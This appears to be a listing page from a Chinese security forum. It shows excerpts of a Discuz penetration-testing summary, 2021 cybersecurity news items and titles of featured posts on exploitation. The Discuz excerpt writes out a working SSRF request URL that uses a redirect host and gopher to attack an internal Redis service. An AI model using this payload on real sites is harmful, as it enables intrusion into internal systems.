Discuz渗透总结

于前面几篇文章中碰到过Discuz,于是介绍了一些Discuz常见漏洞,我们来回顾下。1,SSRF需要前台账户,支持302跳转,可以攻击内网redis/memcache,注意formhash/forum.php?mod=ajax&action=downremoteimg&message=%5bimg=1,1%5dhttp://2.2.2.2/302.php?s=gopher%26ip=127.0.0.1%26port=6379%26data=1.png%5b/img%5d&formhash=b1c1c8b42,任意文件删除需要前台账户,在/home.php?mod=spacecp&ac=profile&op=base修改出生地,使birthp ...

中国工程院院士邬贺铨:网络安全,需在关联企业间形成网络安全威胁情报共享机制

7月27日-29日,第九届互联网安全大会(简称ISC 2021)在北京国家会议中心正式开幕。本届主题为“网络安全需要新战法,网络安全需要新框架”。中国工程院院士邬贺铨出席并做演讲。  会上,邬贺铨提到,网络安全不是单纯的技术问题,是业务、管理、流程、团队、法规等各方面的系统工程,随着产业数字化的推进,新安全问题带 ...

2021-07-28 11:56:27 0 37

Zimbra服务器漏洞可能导致电子邮件掠夺

研究人员称,Zimbra网络邮件服务器有两个漏洞,攻击者可以利用这两个漏洞浏览所有使用这种广受欢迎的协作工具的企业中所有员工的收件箱和发件箱。在周二的一篇评论中,SonarSource称,鉴于Zimbra的受欢迎程度和它所处理的大量信息的高度敏感性质,这是一个“极端”的情况。根据Zimbra的网站,其电子邮件和协作工具被超过20 ...

2021-07-28 08:32:10 0 60

南非主要港口系统遭受黑客攻击 港口货运被迫延迟

据南非媒体当地时间7月27日报道,南非国有物流公司(Transnet)表示,其主要港口的IT系统近一周来遭受网络攻击,对港口集装箱运输产生了巨大影响。目前部分原定停靠开普敦和德班的集装箱船已转移到周边国家港口装卸货物,如南非邻国莫桑比克的港口等。这将导致集装箱船上的货主需要等待很长时间才能收到订购的货物。未来南 ...

2021-07-28 08:28:38 0 59

推动数字时代新型信任体系构建 腾讯零信任获Omdia权威报告推荐

近日,国际知名市场调研机构Omdia发布研究报告《零信任的发展及其在安全远程访问中的应用》(下文简称《报告》),讨论了零信任在网络安全实践中的诸多应用,并且重点聚焦远程访问场景下的零信任访问(ZTA),介绍了腾讯在零信任安全管理系统iOA平台中实施ZTA的案例实践,以期为企业建立安全远程访问体系提供经验和参考。《 ...

2021-07-27 11:49:45 0 102

希腊塞萨洛尼基市政府遭黑客攻击 所幸文件未被破坏

中新网7月25日电 据希腊《中希时报》24日报道,近日,希腊塞萨洛尼基副市长、主管电子政务与移民政策的乔治·阿瓦尔里斯表示,塞萨洛尼基市政府系统遭到黑客攻击。不过,由于市政当局备份了系统数据,当地官员表示,不存在市政府系统中文件被损坏的可能。据报道,当工作人员打开被黑客破坏的文件时,一条英文信息随之弹出, ...

2021-07-27 10:24:57 0 99

因不明原因日本全国机场系统瘫痪:官方紧急修复

据日媒报道,日本航空公司称,当地时间26日上午9时25分左右,日本国内航线相关系统发生故障,所有乘客无法办理登机手续,也无法登机。据悉,羽田机场和大阪机场,新千岁机场等全国各地的机场无法办理登机手续,飞机一度延迟起飞。最新报道显示,故障在当地时间上午10点50分左右全部修复,目前虽然没有停飞的航班,但预计到2 ...

2021-07-26 13:52:40 0 217

热门活动

T00ls专家

zcgonvh

荣誉会员

文章26篇,精华12篇

1

Twi1ight

荣誉会员

文章37篇,精华11篇

2

Bypass

荣誉会员

文章26篇,精华5篇

3

Rices

荣誉会员

文章154篇,精华5篇

4

lyxhh

版主

文章13篇,精华4篇

5

Hmily

新手上路

文章18篇,精华4篇

6

ph12h0n

荣誉会员

文章38篇,精华3篇

7

backlion

注册会员

文章31篇,精华3篇

8

xflxfl

注册会员

文章13篇,精华3篇

9

遇见孤独

荣誉会员

文章51篇,精华2篇

10

最新精华

渗透测试探索低版本.Net反序列化实现Exchange RCE

# 探索低版本.Net反序列化实现Exchange RCE## 0x10 起因近期在 ...

2020-10-20 10:23:31 3 865

渗透测试Spring Boot 相关漏洞利用 Check List

> Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全 ...

2020-06-06 16:16:41 63 9449

渗透测试Windows内网协议-Kerberos

## Kerberos协议### 简介Kerberos是一种由MIT(麻省理工大学)提 ...

2020-04-15 21:59:32 16 1318

渗透测试这是一篇“不一样”的真实渗透测试案例分析文章

# 0x00 前言本文是由一次真实的授权渗透案例引申而出的技术分析 ...

2020-03-20 18:16:34 80 17932

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 16 720

踩一踩windows下配置@Shrimp表哥的xss平台遇到的坑

环境:Windows Service 2012 R2中文版腾讯云服务器(基础网络)先贴表哥的帖子[url]https://www.t00ls.net/viewthread.php?tid=35901&highlight=xss%E5%B9%B3%E5%8F%B0[/url]因为@Shrimp表哥在他的博客上说了很多次不会的直接wamp搭建,我也买了两个服务器,一个ubuntu系统,一个window系统进行搭建。这个文章首先要再次感谢@Shrimp表哥的无私分享,我主要说下我踩过的坑,坑还有点多,我 ...

Top ↑